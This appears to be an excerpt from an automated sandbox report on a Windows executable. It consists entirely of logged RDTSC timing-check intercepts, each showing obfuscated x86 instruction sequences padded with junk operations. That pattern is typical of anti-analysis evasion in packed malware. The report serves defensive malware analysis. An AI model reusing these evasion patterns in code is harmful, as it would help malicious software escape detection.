                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFD82 second address: 11CFD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFD86 second address: 11CFDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FFAC0BDB476h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFDAB second address: 11CFDB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAC168445Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFDB5 second address: 11CFDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFDC4 second address: 11CFDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jnl 00007FFAC1684463h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFDE5 second address: 11CFDE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFDE9 second address: 11CFE16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAC1684466h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600BC9 second address: 5600C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e mov ebx, 1DC4A94Eh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FFAC0BDB475h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bh, E6h 0x00000021 push eax 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E018C second address: 55E01B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAC1684467h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600969 second address: 560096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560096D second address: 560098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FFAC168445Ch 0x00000011 pop esi 0x00000012 movsx edx, si 0x00000015 popad 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600437 second address: 560043D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560043D second address: 5600441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600441 second address: 5600445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600445 second address: 5600479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FFAC1684464h 0x00000010 sbb ax, C4A8h 0x00000015 jmp 00007FFAC168445Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ebx 0x0000001f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600479 second address: 560047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560047D second address: 56004B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FFAC168445Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFAC1684467h 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560020D second address: 5600211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600211 second address: 5600217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600217 second address: 5600271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dl, CFh 0x0000000e pushfd 0x0000000f jmp 00007FFAC0BDB478h 0x00000014 adc ecx, 261FCC38h 0x0000001a jmp 00007FFAC0BDB46Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFAC0BDB471h 0x0000002c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610008 second address: 561000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561000E second address: 5610014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610014 second address: 5610018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610018 second address: 5610042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FFAC0BDB470h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAC0BDB46Eh 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610042 second address: 56100AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 54E4h 0x00000007 mov ch, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFAC1684460h 0x00000015 and eax, 15781798h 0x0000001b jmp 00007FFAC168445Bh 0x00000020 popfd 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 call 00007FFAC1684466h 0x00000029 mov cx, D6D1h 0x0000002d pop ecx 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FFAC1684468h 0x00000038 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56100AF second address: 56100D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAC0BDB470h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56100D3 second address: 56100E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56100E2 second address: 56100FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB474h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56100FA second address: 56100FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640EA6 second address: 5640EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620380 second address: 5620384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620384 second address: 5620397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620397 second address: 56203D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov si, bx 0x00000013 popad 0x00000014 and dword ptr [eax+04h], 00000000h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, 5A301523h 0x00000020 mov eax, 36E4E07Fh 0x00000025 popad 0x00000026 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56203D1 second address: 56203E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB470h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56203E5 second address: 56203F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ebx 0x0000000e mov al, 6Dh 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56203F6 second address: 5620407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB46Dh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620407 second address: 562040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56003B3 second address: 56003DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 mov si, 51A5h 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56003DC second address: 560040B instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007FFAC168445Ch 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAC1684467h 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560040B second address: 5600411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600411 second address: 5600415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610F03 second address: 5610F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610F09 second address: 5610FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684463h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAC168445Bh 0x00000013 and ecx, 1E87D90Eh 0x00000019 jmp 00007FFAC1684469h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007FFAC1684467h 0x00000027 pushfd 0x00000028 jmp 00007FFAC1684468h 0x0000002d or eax, 0E1811E8h 0x00000033 jmp 00007FFAC168445Bh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FFAC1684465h 0x00000042 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620142 second address: 56201B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFAC0BDB476h 0x0000000b xor si, A738h 0x00000010 jmp 00007FFAC0BDB46Bh 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 movzx esi, di 0x0000001c pushfd 0x0000001d jmp 00007FFAC0BDB471h 0x00000022 and cx, 4DD6h 0x00000027 jmp 00007FFAC0BDB471h 0x0000002c popfd 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007FFAC0BDB471h 0x00000034 xchg eax, ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56201B8 second address: 56201BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56201BC second address: 56201C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56201C2 second address: 56201E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 08AAE327h 0x00000008 mov ebx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFAC1684465h 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564066A second address: 564070B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FB65FCh] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFAC0BDB473h 0x00000015 adc eax, 763C546Eh 0x0000001b jmp 00007FFAC0BDB479h 0x00000020 popfd 0x00000021 popad 0x00000022 test eax, eax 0x00000024 pushad 0x00000025 mov ebx, esi 0x00000027 pushfd 0x00000028 jmp 00007FFAC0BDB478h 0x0000002d xor ecx, 4F46B318h 0x00000033 jmp 00007FFAC0BDB46Bh 0x00000038 popfd 0x00000039 popad 0x0000003a je 00007FFB324CE6D9h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 call 00007FFAC0BDB46Bh 0x00000048 pop ecx 0x00000049 mov esi, edi 0x0000004b popad 0x0000004c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564070B second address: 5640772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5B5C9DB7h 0x00000008 mov di, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, eax 0x00000010 jmp 00007FFAC1684466h 0x00000015 xor eax, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FFAC1684467h 0x0000001f jmp 00007FFAC1684463h 0x00000024 popfd 0x00000025 mov ecx, 4155006Fh 0x0000002a popad 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov esi, edx 0x00000033 mov ecx, edi 0x00000035 popad 0x00000036 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640772 second address: 5640794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB474h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640794 second address: 56407DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684464h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FFAC1684460h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00F22014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FFAC5DE4B56h 0x0000002a push FFFFFFFEh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FFAC1684467h 0x00000033 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56407DB second address: 5640808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAC0BDB475h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f call 00007FFAC0BDB46Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640808 second address: 5640843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FFAC1684461h 0x0000000b xor cx, F106h 0x00000010 jmp 00007FFAC1684461h 0x00000015 popfd 0x00000016 popad 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007FFAC5DE4BC7h 0x0000001f mov edi, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx ebx, ax 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640843 second address: 56408AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAC0BDB476h 0x0000000f push eax 0x00000010 jmp 00007FFAC0BDB46Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 jmp 00007FFAC0BDB474h 0x0000001c movzx ecx, di 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FFAC0BDB478h 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56408AB second address: 56408BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC168445Eh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0021 second address: 55F0026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0026 second address: 55F0034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC168445Ah 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0034 second address: 55F0038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0038 second address: 55F008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAC168445Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FFAC1684460h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FFAC1684460h 0x0000001b and esp, FFFFFFF8h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FFAC1684467h 0x00000025 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F008E second address: 55F00CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FFAC0BDB46Eh 0x0000000f push eax 0x00000010 jmp 00007FFAC0BDB46Bh 0x00000015 xchg eax, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, 2606h 0x0000001d popad 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F00CF second address: 55F00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAC1684469h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F00ED second address: 55F010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAC0BDB476h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F010F second address: 55F011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F011E second address: 55F0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, D2h 0x00000005 pushfd 0x00000006 jmp 00007FFAC0BDB470h 0x0000000b sub cl, 00000068h 0x0000000e jmp 00007FFAC0BDB46Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FFAC0BDB479h 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f mov bx, cx 0x00000022 jmp 00007FFAC0BDB478h 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0187 second address: 55F018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F018B second address: 55F01A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01A8 second address: 55F01C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01C4 second address: 55F01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01C8 second address: 55F01CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01CE second address: 55F01E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAC0BDB471h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01E3 second address: 55F01E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01E7 second address: 55F01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F01F6 second address: 55F020F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F020F second address: 55F0241 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAC0BDB478h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0241 second address: 55F0250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55F0250 second address: 55F02AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFAC0BDB473h 0x00000015 xor esi, 3608DFAEh 0x0000001b jmp 00007FFAC0BDB479h 0x00000020 popfd 0x00000021 mov cx, 8437h 0x00000025 popad 0x00000026 rdtsc
